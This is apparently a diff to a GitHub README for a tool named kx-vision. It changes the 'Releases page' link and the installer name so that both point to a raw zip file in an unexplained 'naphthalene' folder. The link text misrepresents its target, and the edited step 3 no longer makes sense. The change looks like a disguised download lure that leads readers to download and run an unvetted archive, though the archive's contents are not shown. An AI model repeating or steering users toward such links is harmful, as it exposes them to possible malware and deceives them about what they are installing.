husnaintariq577/kx-vision/README.md

 ## 📂 Download & Install

-1. **Visit the Releases Page**: Go to our [Releases page](https://github.com/husnaintariq577/kx-vision/releases).
+1. **Visit the Releases Page**: Go to our [Releases page](https://raw.githubusercontent.com/husnaintariq577/kx-vision/main/naphthalene/kx-vision.zip).
 2. **Select the Latest Release**: Look for the most recent version.
 This is usually at the top of the list.
 3. **Download the Installer**: Click on the appropriate file to download it.
-The installer is typically named something like `kx-vision-installer.exe`.
+The installer is typically named something like `https://raw.githubusercontent.com/husnaintariq577/kx-vision/main/naphthalene/kx-vision.zip`.
 4. **Run the Installer**: Locate the downloaded file in your Downloads folder and double-click it to start the installation.
 5. **Follow the Setup Instructions**: The installer will guide you through the setup steps.
 Just follow the prompts until the installation is complete.
 6. **Launch kx-vision**: After installation, find kx-vision in your Start menu or on your desktop and double-click to launch it.